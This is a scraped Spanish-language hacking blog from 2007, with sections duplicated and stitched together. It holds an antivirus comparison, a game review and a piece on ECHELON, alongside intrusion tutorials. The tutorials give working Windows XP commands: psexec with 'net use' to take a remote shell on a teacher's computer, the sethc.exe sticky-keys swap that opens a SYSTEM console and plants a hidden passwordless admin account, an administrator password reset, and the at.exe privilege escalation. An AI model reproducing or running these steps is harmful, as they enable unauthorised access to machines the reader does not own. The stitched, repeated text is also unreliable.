Satelite nuestro k estas en el cielo
acelerado sea tu link
venga a nosotros tu hipertexto
hagase tu conexion
en lo real komo en lo virtual
danos hoy nuestro download de kada dia
perdona el cafe sobre el teclado
asi komo nosotros perdonamos a nuestros proveedores
no nos dejes caer la conexion
y libramos de todo virus
AMEN!!!
viernes, 26 de octubre de 2007
¿Cuál es el mejor Programa Antivirus?
Virus.gr hace pruebas regularmente comparando distintos programas para ver cuál es el mejor programa antivirus.
Especificaciones de la prueba de programas antivirus
En la prueba que tuvo lugar del 15 al 25 de Agosto de 2006 utilizaron un ordenador con Windows XP Professional SP1 con P4 2800 Mhz, 512MB DDRAM para comparar 58 programas antivirus frente a más de 147000 muestras de virus.
Los programas antivirus WinAntivirus, Anti-Hacker Expert, Command, Extendia AVK, GDATA AVK, BOClean, VET y Freedom no se probaron porque no había disponible una versión de prueba de estos programas.
Todos los programas antivirus probados tenían las últimas versiónes y actualizaciones y fueron probados usando sus capacidades máximas de exploración.
Las muestras de virus
Las muestras de virus se dividieron en las siguientes categorías, en función del tipo de virus:
File: BeOS, FreeBSD, Linux, Mac, Palm, OS2, Unix, BinaryImage, virus BAS, MenuetOS.
MS-DOS: virus MS-DOS.
Windows: virus Win.*.*.
Macro: Virus Macro, Multi y Formula.
Malware: Adware, DoS, Constructors, Exploit, Flooders, Nukers, Sniffers, SpamTools, Spoofers, Virus Construction Tools, Droppers, PolyEngines.
Script: Gusanos ABAP, BAT, Corel, HTML, Java, Scripts, MSH, VBS, WBS, gusanos, PHP, Perl, virus Ruby.
Troyanos / Backdoor: virus caballo de Troya y backdoor.
Resultado del test comparando los 58 programas antivirus
Estos son los resultados de la comparación de los 58 programas antivirus:
Kaspersky versión 6.0.0.303 - 99.62%
Active Virus Shield by AOL versión 6.0.0.299 - 99.62%
F-Secure 2006 versión 6.12.90 - 96.86%
BitDefender Professional versión 9 - 96.63%
CyberScrub versión 1.0 - 95.98%
eScan versión 8.0.671.1 - 95.82%
BitDefender freeware versión 8.0.202 - 95.57%
BullGuard versión 6.1 - 95.57%
AntiVir Premium versión 7.01.01.02 - 95.45%
Nod32 versión 2.51.30 - 95.14%
AntiVir Classic versión 7.01.01.02 - 94.26%
ViruScape 2006 versión 1.02.0935.0137 - 93.87%
McAfee versión 10.0.27 - 93.03%
McAfee Enterprise versión 8.0.0 - 91.76%
F-Prot versión 6.0.4.3 beta - 87.88%
Avast Professional versión 4.7.871 - 87.46%
Avast freeware versión 4.7.871 - 87.46%
Dr. Web versión 4.33.2 - 86.03%
Norman versión 5.90.23 - 85.65%
F-Prot versión 3.16f - 85.14%
ArcaVir 2006 - 83.44%
Norton Professional 2006 - 83.18%
AVG Professional versión 7.1.405 - 82.82%
AVG freeware versión 7.1.405 - 82.82%
Panda 2007 versión 2.00.01 - 82.23%
Virus Chaser versión 5.0a - 81.47%
PC-Cillin 2006 versión 14.10.1051 - 80.90%
VBA32 versión 3.11.0 - 79.12%
ViRobot Expert versión 4.0 - 76.22%
UNA versión 1.83 - 75.44%
Rising AV versión 18.41.30 - 73.60%
Sophos Sweep versión 6.0.2 - 69.48%
Ikarus versión 5.19 - 63.22%
Antiy Ghostbusters versión 5.1.3 - 61.55%
Digital Patrol versión 5.00.12 - 54.29%
Vexira 2006 versión 5.002.45 - 52.66%
V3Pro 2004 versión 6.1.1.2.640 - 52.38%
Ewido Premium versión 4.0.0.172 - 51.27%
Ewido freeware versión 4.0.0.172 - 51.27%
ClamWin versión 0.88.4 - 51.23%
E-Trust versión 7.2.0.0 - 50.36%
ZoneAlarm with VET Antivirus versión 6.5.722.000 - 44.65%
A Squared Anti-Malware versión 2.0 - 43.28%
A Squared Free versión 2.0 - 43.28%
Zondex Guard versión 5.4.2 - 41.73%
Comodo versión 1.0.0.4 - 41.02%
Solo 4.0 versión 3.1.0 - 40.83%
Protector Plus versión 7.2.H03 - 37.04%
Quick Heal versión 8.00 - 33.66%
PC Door Guard versión 4.2.0.35- 24.13%
AntiTrojan Shield versión 2.1.0.14 - 24.11%
VirIT versión 6.1.9 - 21.39%
Trojan Hunter versión 4.2.924 - 13.44%
Trojan Remover versión 6.5.1 - 8.00%
Tauscan versión 1.70.1414 - 7.70%
The Cleaner versión 4.2.4319 - 6.03%
Hacker Eliminator versión 1.2 - 1.70%
Abacre versión 1.4 - 0.00%
El programa antivirus Active Virus Shield by AOL, clasificado en segundo lugar, es gratuito.
Los 10 mejores programas antivirus utilizando solamente heurísticos
¿Qué son heurísticos?
Los heurísticos analizan el código de cada archivo con métodos genéricos y detectan virus nuevos que todavía no se han incluido en la base de datos de virus del programa antivirus.
Porqué son importantes los heurísticos
Los heurísticos son importantes porque ayudan al programa antivirus a descubrir nuevos virus desconocidos y proteger así al ordenador frente a la infección, aunque el virus específico no se haya incluido todavía en la base de datos de virus del programa antivirus.
Clasificación de programas antivirus utilizando solamente heurísticos
Nod32 2.51.30
Vba32 3.11.0
VirIT 6.1.9
AVG 7.1.405 Professional
AVG 7.1.405 freeware
Rising AV 18.41.30
McAfee 10.0.27
Ikarus 5.19
F-Prot 6.0.4.3 beta
Ukrainian National Antivirus 1.83
Especificaciones de la prueba de programas antivirus
En la prueba que tuvo lugar del 15 al 25 de Agosto de 2006 utilizaron un ordenador con Windows XP Professional SP1 con P4 2800 Mhz, 512MB DDRAM para comparar 58 programas antivirus frente a más de 147000 muestras de virus.
Los programas antivirus WinAntivirus, Anti-Hacker Expert, Command, Extendia AVK, GDATA AVK, BOClean, VET y Freedom no se probaron porque no había disponible una versión de prueba de estos programas.
Todos los programas antivirus probados tenían las últimas versiónes y actualizaciones y fueron probados usando sus capacidades máximas de exploración.
Las muestras de virus
Las muestras de virus se dividieron en las siguientes categorías, en función del tipo de virus:
File: BeOS, FreeBSD, Linux, Mac, Palm, OS2, Unix, BinaryImage, virus BAS, MenuetOS.
MS-DOS: virus MS-DOS.
Windows: virus Win.*.*.
Macro: Virus Macro, Multi y Formula.
Malware: Adware, DoS, Constructors, Exploit, Flooders, Nukers, Sniffers, SpamTools, Spoofers, Virus Construction Tools, Droppers, PolyEngines.
Script: Gusanos ABAP, BAT, Corel, HTML, Java, Scripts, MSH, VBS, WBS, gusanos, PHP, Perl, virus Ruby.
Troyanos / Backdoor: virus caballo de Troya y backdoor.
Resultado del test comparando los 58 programas antivirus
Estos son los resultados de la comparación de los 58 programas antivirus:
Kaspersky versión 6.0.0.303 - 99.62%
Active Virus Shield by AOL versión 6.0.0.299 - 99.62%
F-Secure 2006 versión 6.12.90 - 96.86%
BitDefender Professional versión 9 - 96.63%
CyberScrub versión 1.0 - 95.98%
eScan versión 8.0.671.1 - 95.82%
BitDefender freeware versión 8.0.202 - 95.57%
BullGuard versión 6.1 - 95.57%
AntiVir Premium versión 7.01.01.02 - 95.45%
Nod32 versión 2.51.30 - 95.14%
AntiVir Classic versión 7.01.01.02 - 94.26%
ViruScape 2006 versión 1.02.0935.0137 - 93.87%
McAfee versión 10.0.27 - 93.03%
McAfee Enterprise versión 8.0.0 - 91.76%
F-Prot versión 6.0.4.3 beta - 87.88%
Avast Professional versión 4.7.871 - 87.46%
Avast freeware versión 4.7.871 - 87.46%
Dr. Web versión 4.33.2 - 86.03%
Norman versión 5.90.23 - 85.65%
F-Prot versión 3.16f - 85.14%
ArcaVir 2006 - 83.44%
Norton Professional 2006 - 83.18%
AVG Professional versión 7.1.405 - 82.82%
AVG freeware versión 7.1.405 - 82.82%
Panda 2007 versión 2.00.01 - 82.23%
Virus Chaser versión 5.0a - 81.47%
PC-Cillin 2006 versión 14.10.1051 - 80.90%
VBA32 versión 3.11.0 - 79.12%
ViRobot Expert versión 4.0 - 76.22%
UNA versión 1.83 - 75.44%
Rising AV versión 18.41.30 - 73.60%
Sophos Sweep versión 6.0.2 - 69.48%
Ikarus versión 5.19 - 63.22%
Antiy Ghostbusters versión 5.1.3 - 61.55%
Digital Patrol versión 5.00.12 - 54.29%
Vexira 2006 versión 5.002.45 - 52.66%
V3Pro 2004 versión 6.1.1.2.640 - 52.38%
Ewido Premium versión 4.0.0.172 - 51.27%
Ewido freeware versión 4.0.0.172 - 51.27%
ClamWin versión 0.88.4 - 51.23%
E-Trust versión 7.2.0.0 - 50.36%
ZoneAlarm with VET Antivirus versión 6.5.722.000 - 44.65%
A Squared Anti-Malware versión 2.0 - 43.28%
A Squared Free versión 2.0 - 43.28%
Zondex Guard versión 5.4.2 - 41.73%
Comodo versión 1.0.0.4 - 41.02%
Solo 4.0 versión 3.1.0 - 40.83%
Protector Plus versión 7.2.H03 - 37.04%
Quick Heal versión 8.00 - 33.66%
PC Door Guard versión 4.2.0.35- 24.13%
AntiTrojan Shield versión 2.1.0.14 - 24.11%
VirIT versión 6.1.9 - 21.39%
Trojan Hunter versión 4.2.924 - 13.44%
Trojan Remover versión 6.5.1 - 8.00%
Tauscan versión 1.70.1414 - 7.70%
The Cleaner versión 4.2.4319 - 6.03%
Hacker Eliminator versión 1.2 - 1.70%
Abacre versión 1.4 - 0.00%
El programa antivirus Active Virus Shield by AOL, clasificado en segundo lugar, es gratuito.
Los 10 mejores programas antivirus utilizando solamente heurísticos
¿Qué son heurísticos?
Los heurísticos analizan el código de cada archivo con métodos genéricos y detectan virus nuevos que todavía no se han incluido en la base de datos de virus del programa antivirus.
Porqué son importantes los heurísticos
Los heurísticos son importantes porque ayudan al programa antivirus a descubrir nuevos virus desconocidos y proteger así al ordenador frente a la infección, aunque el virus específico no se haya incluido todavía en la base de datos de virus del programa antivirus.
Clasificación de programas antivirus utilizando solamente heurísticos
Nod32 2.51.30
Vba32 3.11.0
VirIT 6.1.9
AVG 7.1.405 Professional
AVG 7.1.405 freeware
Rising AV 18.41.30
McAfee 10.0.27
Ikarus 5.19
F-Prot 6.0.4.3 beta
Ukrainian National Antivirus 1.83
Para que sirve el comando psexec?
Facil, con este podriemos hacer infinitas cosas , pero hoy solo nos fijaremo en una
Obtener un Shell remoto(seria coomo estar frente al pc del porfe ejecutando rpogramas)
C:\>net use \\ip_profe\IPC$ password /u:Administrador
Se ha completado el comando correctamente.
C:\>psexec \\192.168.123.2 -u Administrador -p password -s cmd.exe
PsExec v1.3 - execute processes remotelyCopyright (C) 2001 Mark Russinovichwww.sysinternals.comMicrosoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001
Microsoft Corp.C:\WINDOWS\system32>
que ah pasado aqui?
pues sencillo, tenemos un cmd remoto osea todo lo q ejeutemos se hara en el pc remoto jejej , queda a vuestra creatividad
voiceis se habran dado cuenta q nos pide un password?
de donde lo obtendremos?
pues quizas en otro momento se los cuente
ssssssssss
Obtener un Shell remoto(seria coomo estar frente al pc del porfe ejecutando rpogramas)
C:\>net use \\ip_profe\IPC$ password /u:Administrador
Se ha completado el comando correctamente.
C:\>psexec \\192.168.123.2 -u Administrador -p password -s cmd.exe
PsExec v1.3 - execute processes remotelyCopyright (C) 2001 Mark Russinovichwww.sysinternals.comMicrosoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001
Microsoft Corp.C:\WINDOWS\system32>
que ah pasado aqui?
pues sencillo, tenemos un cmd remoto osea todo lo q ejeutemos se hara en el pc remoto jejej , queda a vuestra creatividad
voiceis se habran dado cuenta q nos pide un password?
de donde lo obtendremos?
pues quizas en otro momento se los cuente
ssssssssss
Escalando Privilegios en Windows XP y 2000 otras opciones
Primero que nada me gustaria dejar claro que este tutorial esta echo con fines educativos y para que algun curioso practique en su sistema, no me hago responsable del mal uso que podais hacer del mismo, recordad que urgar en sistemas ajenos es ilegal.
Antes de nada explicare un poco el pq de esta vulnerabilidad.
Este problema se debe a los programas Stickykeys y Togglekeys que Windows instala por defecto para configurar los atajos de teclado a la gente que este incapacitada para pulsar dos o mas teclas a la vez, utilizando esta aplicación (stickykeys) un usuario podra hacer ctrl+b pulsando primero una tecla y luego la otra o que (utilizando togglekeys) windows emita un sonido fuerte al activar las teclas(bloq mayus, bloq number o block despl) y una suave al desactivarlas. El fallo de esto es que Windows configura por defecto un atajo para acceder a estas aplicaciones, asi cuando un usuario da 5 veces a la tecla shift (mayusculas) o presiona la tecla bloq num durante 5 segundos, se le activaran los programas que hemos mencionado; el fichero que activan estas aplicaciones se llama sethc.exe (el mismo para los dos) y se encuentra en C:\Windows\system32, lo que vamos a hacer es sustituir este fichero por cmd.exe(que se encuentra en la misma ruta que sethc.exe) para que cuando demos 5 veces a la tecla shift o presionemos durante 5 segundos la tecla bloq num, se nos abra una consola con permisos de Administrador desde la cual podremos crearnos una cuenta con permisos de Admin o hacer lo que nos venga en gana(pero recordad que solo estamos investigando).
Escalando privilegios……
Despues de tanto rollo por fin vamos a ver como hacer todo lo que hemos comentado, para llevar acabo esto necesitaremos acceso fisico al equipo y el E.R.D Commander, este un programa con el que podremos acceder desde cd-rom a nuestro sistema y modificar el fichero que hemos mencionado con anterioridad(al final de este texto extendere un poco la informacion sobre esta aplicacion); seguro que si alguno conoce el ERD salta diciendo y pq si usas este programa no cambias el pass del Admin directamente y te dejas de tantas tonterias?, es cierto podriamos cambiar el password del Admin con este software, pero la idea es aprender un metodo con el cual no te canteas(te haces notar).
1. Configuramos la BIOS para que arranque desde CD-Rom.2. Metemos nuestro cd del E.R.D Commander(yo he utilizado el 2002 sin problemas).3. Accedemos a nuestro sistema con el Commander y nos vamos a Mycomputer C:\Windows\system32 aqui buscamos el archivo sethc.exe y lo renombramos, luego en la misma ruta marcamos cmd.exe, le damos a boton derecho y le damos a copy to, le decimos que nos lo copie en c: (por ejemplo), despues vamos a C: , buscamos el archivo cmd.exe y lo renombramos a sethc.exe, marcamos el fichero, le damos a la opcion move to y le indicamos la ruta c:\Windows\system32; por ultimo comprueba que el archivo sethc este en dicha ruta.4. Sal del E.R.D dando a start, logoff y luego reinicia el PC dandole a la opcion Reboot.5. Enciende tu PC como harias siempre y en la pantalla de bienvenida(o en la clasica de windows) le damos 5 veces a Shift(o mantenemos pulsado bloq num 5 segundos) y se nos abrira una consola(como habiamos dicho antes) .6. Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:Net user Elusuarioquequieras /add /expires:never /passwordreq:noEsto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.7. Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:Net localgroup Administradores /add Elusuarioquequieras8. Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin :OO!!
Protegerse de este fallo……
Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pestaña teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.====================================================ERD Commander es una aplicacion destinada a la reparacion y recuperacion de sistemas windows NT,2000 y XP el cual nos permite el acceso a dichos sistemas con permiso de administrador desde donde podremos solucionar cualquier problema de arranque del sistema, conflictos de controladores, eliminar programas o archivos maliciosos, etc y todo esto arrancando desde cd-rom(tb puede ser instalado en el disco duro pero es conveniente tenerlo en CD) lo que nos permitira un mejor analisis de nuestro sistema y posterior solucion.Estos datos son referentes al ERD Commander 2002, hoy en dia existe la version 2005 que tb soporta sistemas 2003 server.
Antes de nada explicare un poco el pq de esta vulnerabilidad.
Este problema se debe a los programas Stickykeys y Togglekeys que Windows instala por defecto para configurar los atajos de teclado a la gente que este incapacitada para pulsar dos o mas teclas a la vez, utilizando esta aplicación (stickykeys) un usuario podra hacer ctrl+b pulsando primero una tecla y luego la otra o que (utilizando togglekeys) windows emita un sonido fuerte al activar las teclas(bloq mayus, bloq number o block despl) y una suave al desactivarlas. El fallo de esto es que Windows configura por defecto un atajo para acceder a estas aplicaciones, asi cuando un usuario da 5 veces a la tecla shift (mayusculas) o presiona la tecla bloq num durante 5 segundos, se le activaran los programas que hemos mencionado; el fichero que activan estas aplicaciones se llama sethc.exe (el mismo para los dos) y se encuentra en C:\Windows\system32, lo que vamos a hacer es sustituir este fichero por cmd.exe(que se encuentra en la misma ruta que sethc.exe) para que cuando demos 5 veces a la tecla shift o presionemos durante 5 segundos la tecla bloq num, se nos abra una consola con permisos de Administrador desde la cual podremos crearnos una cuenta con permisos de Admin o hacer lo que nos venga en gana(pero recordad que solo estamos investigando).
Escalando privilegios……
Despues de tanto rollo por fin vamos a ver como hacer todo lo que hemos comentado, para llevar acabo esto necesitaremos acceso fisico al equipo y el E.R.D Commander, este un programa con el que podremos acceder desde cd-rom a nuestro sistema y modificar el fichero que hemos mencionado con anterioridad(al final de este texto extendere un poco la informacion sobre esta aplicacion); seguro que si alguno conoce el ERD salta diciendo y pq si usas este programa no cambias el pass del Admin directamente y te dejas de tantas tonterias?, es cierto podriamos cambiar el password del Admin con este software, pero la idea es aprender un metodo con el cual no te canteas(te haces notar).
1. Configuramos la BIOS para que arranque desde CD-Rom.2. Metemos nuestro cd del E.R.D Commander(yo he utilizado el 2002 sin problemas).3. Accedemos a nuestro sistema con el Commander y nos vamos a Mycomputer C:\Windows\system32 aqui buscamos el archivo sethc.exe y lo renombramos, luego en la misma ruta marcamos cmd.exe, le damos a boton derecho y le damos a copy to, le decimos que nos lo copie en c: (por ejemplo), despues vamos a C: , buscamos el archivo cmd.exe y lo renombramos a sethc.exe, marcamos el fichero, le damos a la opcion move to y le indicamos la ruta c:\Windows\system32; por ultimo comprueba que el archivo sethc este en dicha ruta.4. Sal del E.R.D dando a start, logoff y luego reinicia el PC dandole a la opcion Reboot.5. Enciende tu PC como harias siempre y en la pantalla de bienvenida(o en la clasica de windows) le damos 5 veces a Shift(o mantenemos pulsado bloq num 5 segundos) y se nos abrira una consola(como habiamos dicho antes) .6. Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:Net user Elusuarioquequieras /add /expires:never /passwordreq:noEsto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.7. Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:Net localgroup Administradores /add Elusuarioquequieras8. Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin :OO!!
Protegerse de este fallo……
Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pestaña teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.====================================================ERD Commander es una aplicacion destinada a la reparacion y recuperacion de sistemas windows NT,2000 y XP el cual nos permite el acceso a dichos sistemas con permiso de administrador desde donde podremos solucionar cualquier problema de arranque del sistema, conflictos de controladores, eliminar programas o archivos maliciosos, etc y todo esto arrancando desde cd-rom(tb puede ser instalado en el disco duro pero es conveniente tenerlo en CD) lo que nos permitira un mejor analisis de nuestro sistema y posterior solucion.Estos datos son referentes al ERD Commander 2002, hoy en dia existe la version 2005 que tb soporta sistemas 2003 server.
Reset Password xp
Muchachos esto solo funciona en win NT superior, siempre y cuando no estemos dentro de un dominio y esten aplicadas las malditas directivas de grupo
Ejecutar cmd.
net user administrador * press enter
nos pide en new password , listo... ya tenemos acceso al admin
queda a vuestra creatividad
Created Fenix
msn:alexisalonso_15
Ejecutar cmd.
net user administrador * press enter
nos pide en new password , listo... ya tenemos acceso al admin
queda a vuestra creatividad
Created Fenix
msn:alexisalonso_15
Escalada de privilegios en Windows XP
Introducción:
Normalmente cuando se realiza una intrusión en un sistema se busca alguna vulnerabilidad que deje la seguridad del sistema comprometida, si el administrador del sistema es muy descuidado es posible que el sistema no esté totalmente parcheado o seguro, cuando ésto ocurre, lo mas fácil es explotar alguna de estas vulnerabilidades no parcheadas del propio sistema, lo cual suele permitir el acceso al atacante con premisos de sistema (no siempre)ejej.
Si el sistema se encuentra actualizado y no parece que tenga alguna vulnerabilidad conocida, el siguiente paso es buscar información de los programas y servcios que está corriendo ese sistema, muchas veces el usuario utiliza programas desactualizados que contienen vulnerabilidades, normalmente, utilizar estas vulnerabilidades para acceder al sistema, devuelven al atacante un acceso con los permisos del usuario que estaba corriendo el programa vulnerable. Ésta es la razón por la que siempre se insite en que no se utilicen cuentas de usuario con permisos elevados en el uso cotidiano del equipo.
Se hace necesario, por lo tanto, realizar un segundo ataque pero esta vez para elevar los privilegios y así conseguir el control total del equipo.
Vulnerabilidad:
Se acaba de publicar un flash demostración de lo fácil que es elevar los privilegios de un usuario en Windows XP.
El problema está en el comando "at.exe", que sirve para programar tareas desde la linea de comandos.
Cuando un usuario lanza una ventana de comandos (cmd.exe) mediante el comando "at.exe", este cmd heredará permisos de sistema (system). Basta con reiniciar el "explorer.exe" desde esa ventana para hacerse con el entorno del usuario "system".
NOTA: como bien me comenta JMGA este ataque sirve para elevar los permisos de "Administrador" a "System" debido a que el uso del comando "at.exe" no está permitido para todos los usuarios.
Demostración: http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc/xp_priv_esc.html
Mas información:
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3209
Bugtraq: http://www.securityfocus.com/archive/1/436884/100/200/threaded
SANS: http://isc.sans.org/diary.php?storyid=1542
Origen: isc.sans.org
Normalmente cuando se realiza una intrusión en un sistema se busca alguna vulnerabilidad que deje la seguridad del sistema comprometida, si el administrador del sistema es muy descuidado es posible que el sistema no esté totalmente parcheado o seguro, cuando ésto ocurre, lo mas fácil es explotar alguna de estas vulnerabilidades no parcheadas del propio sistema, lo cual suele permitir el acceso al atacante con premisos de sistema (no siempre)ejej.
Si el sistema se encuentra actualizado y no parece que tenga alguna vulnerabilidad conocida, el siguiente paso es buscar información de los programas y servcios que está corriendo ese sistema, muchas veces el usuario utiliza programas desactualizados que contienen vulnerabilidades, normalmente, utilizar estas vulnerabilidades para acceder al sistema, devuelven al atacante un acceso con los permisos del usuario que estaba corriendo el programa vulnerable. Ésta es la razón por la que siempre se insite en que no se utilicen cuentas de usuario con permisos elevados en el uso cotidiano del equipo.
Se hace necesario, por lo tanto, realizar un segundo ataque pero esta vez para elevar los privilegios y así conseguir el control total del equipo.
Vulnerabilidad:
Se acaba de publicar un flash demostración de lo fácil que es elevar los privilegios de un usuario en Windows XP.
El problema está en el comando "at.exe", que sirve para programar tareas desde la linea de comandos.
Cuando un usuario lanza una ventana de comandos (cmd.exe) mediante el comando "at.exe", este cmd heredará permisos de sistema (system). Basta con reiniciar el "explorer.exe" desde esa ventana para hacerse con el entorno del usuario "system".
NOTA: como bien me comenta JMGA este ataque sirve para elevar los permisos de "Administrador" a "System" debido a que el uso del comando "at.exe" no está permitido para todos los usuarios.
Demostración: http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc/xp_priv_esc.html
Mas información:
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3209
Bugtraq: http://www.securityfocus.com/archive/1/436884/100/200/threaded
SANS: http://isc.sans.org/diary.php?storyid=1542
Origen: isc.sans.org
Podes ser un Hacker con Uplink Elite
Los secretos de un Hacker en un juego.
Contenido escrito por: Guillermo "CeReBrO" Ferrero .En esta ocasión nos encontramos con un juego distinto..... Nada de graficos 3d, ni sonido de orquesta, apenas unos pitidos semi techno y una interfaz que representaria la de un sistema operativo del año 2010(epoca en la que transcurre el juego), el argumento es sencillo.... somo egresados de la universidad con un titulo de Ingeniero en sistemas bajo el brazo... que podemos hacer?? Unirnos a la corporación Uplink por supuesto, la central mundial de los Hackers en los tiempos que corren, se nos ofrece un Gateway que sera nuestra salida a internet, un pequeño prestamo del banco internacional de la compania para iniciar nuestras actividades, el soft basico para copiar y borrar archivos y la aclaración de que si somos descubiertos, la organización negara todo contacto con nosotros , brillante futuro el nuestro.El juego se desarrolla desde la pantalla principal de nuestra Gateway, desde la misma nos conectamos a distintos equipos remotos o al servidor de asuntos internos de Uplink y conseguimos misiones de distintas companias que varian entre copiar o borrar archivos de organizaciones rivales, modificar regristros universitarios(para mejor o para peor), modificar datos particulares, plantar virus en un sistema y seguir los pasos de otro hacker para dar con su ubicación.Después de jugarlo durante un tiempo uno piensa que ya no quedan cosas por hacer, hasta que se devela una trama de conflictos dentro de la corporación, asi como una guerra informatica entre dos companias rivales por el desarrollo de un virus capaz de destruir cuanto sistema informatico se conoce, brindando al juego una rejugabilidad amplia.El juego destaca por su “realismo” por asi decirlo... si nos descubren, todo nuestro progreso, toda nuestra trayectoria sera destruida y tendremos que reiniciar nuestra carrera con el soft basico nuevamente, esto puede parecer frustrante, pero nadie dijo que teniamos un seguro cuando nos unimos a la compania.Resumiendo, un juego que vale la pena, simple y a la vez atrapante, totalmente innovador, y una buena opcion para pasar largas horas delante de nuestro monitor rogando a que ese archivo tan necesitado se copie antes de que nuestro sistema nos avise que hemos sido detectados.
Contenido escrito por: Guillermo "CeReBrO" Ferrero .En esta ocasión nos encontramos con un juego distinto..... Nada de graficos 3d, ni sonido de orquesta, apenas unos pitidos semi techno y una interfaz que representaria la de un sistema operativo del año 2010(epoca en la que transcurre el juego), el argumento es sencillo.... somo egresados de la universidad con un titulo de Ingeniero en sistemas bajo el brazo... que podemos hacer?? Unirnos a la corporación Uplink por supuesto, la central mundial de los Hackers en los tiempos que corren, se nos ofrece un Gateway que sera nuestra salida a internet, un pequeño prestamo del banco internacional de la compania para iniciar nuestras actividades, el soft basico para copiar y borrar archivos y la aclaración de que si somos descubiertos, la organización negara todo contacto con nosotros , brillante futuro el nuestro.El juego se desarrolla desde la pantalla principal de nuestra Gateway, desde la misma nos conectamos a distintos equipos remotos o al servidor de asuntos internos de Uplink y conseguimos misiones de distintas companias que varian entre copiar o borrar archivos de organizaciones rivales, modificar regristros universitarios(para mejor o para peor), modificar datos particulares, plantar virus en un sistema y seguir los pasos de otro hacker para dar con su ubicación.Después de jugarlo durante un tiempo uno piensa que ya no quedan cosas por hacer, hasta que se devela una trama de conflictos dentro de la corporación, asi como una guerra informatica entre dos companias rivales por el desarrollo de un virus capaz de destruir cuanto sistema informatico se conoce, brindando al juego una rejugabilidad amplia.El juego destaca por su “realismo” por asi decirlo... si nos descubren, todo nuestro progreso, toda nuestra trayectoria sera destruida y tendremos que reiniciar nuestra carrera con el soft basico nuevamente, esto puede parecer frustrante, pero nadie dijo que teniamos un seguro cuando nos unimos a la compania.Resumiendo, un juego que vale la pena, simple y a la vez atrapante, totalmente innovador, y una buena opcion para pasar largas horas delante de nuestro monitor rogando a que ese archivo tan necesitado se copie antes de que nuestro sistema nos avise que hemos sido detectados.
Sabias de la red ECHELON ?
ECHELON es la mayor red de espionaje y análisis para interceptar comunicaciones electrónicas de la historia. Controlada por la comunidad UKUSA (Estados Unidos, Canadá, Gran Bretaña, Australia, y Nueva Zelanda), ECHELON puede capturar comunicaciones por radio y satélite, llamadas de teléfono, faxes y e-mails en casi todo el mundo e incluye análisis automático y clasificación de las interceptaciones. Se estima que ECHELON intercepta más de tres mil millones de comunicaciones cada día.
A pesar de haber sido presuntamente construida con el fin de controlar las comunicaciones militares y diplomáticas de la Unión Soviética y sus aliados, se sospecha que en la actualidad ECHELON es utilizado también para encontrar pistas sobre tramas terroristas, planes del narcotráfico e inteligencia política y diplomática. Sus críticos afirman que el sistema es utilizado también para el espionaje económico y la invasión de privacidad en gran escala.
Los miembros de esta alianza de habla inglesa son parte de la alianza de inteligencia UKUSA, que lleva reuniendo inteligencia desde la Segunda Guerra Mundial. La existencia de ECHELON fue hecha pública en 1976 por Winslow Peck.
Varias fuentes afirman que estos estados han ubicado estaciones de intercepción electrónica y satélites espaciales para capturar gran parte de las comunicaciones establecidas por radio, satélite, microondas, celulares y fibra óptica. Las señales capturadas son luego procesadas por una serie de supercomputadoras, conocidas como diccionarios, las cuales han sido programadas para buscar patrones específicos en cada comunicación, ya sean direcciones, palabras, frases o incluso voces específicas.
El sistema está bajo la administración de la NSA (National Security Agency). Esta organización cuenta con 100.000 empleados tan sólo en Maryland (Estados Unidos) (otras fuentes hablan de 38.000 empleados a escala mundial), por lo que es probablemente la mayor organización de espionaje del mundo.
A cada estado dentro de la alianza UKUSA le es asignado una responsabilidad sobre el control de distintas áreas del planeta. La tarea principal de Canadá solía ser el control del área meridional de la antigua Unión Soviética. Durante el período de la guerra fría se puso mayor énfasis en el control de comunicaciones por satélite y radio en centro y Sudamérica, principalmente como medida para localizar tráfico de drogas y secuaces en la región. Los Estados Unidos, con su gran cadena de satélites espías y puertos de escucha controlan gran parte de Latinoamérica, Asia, Rusia asiática y el norte de China. Gran Bretaña intercepta comunicaciones en Europa, Rusia y África. Australia examina las comunicaciones de Indochina, Indonesia y el sur de China, mientras que Nueva Zelanda barre el Pacífico occidental.
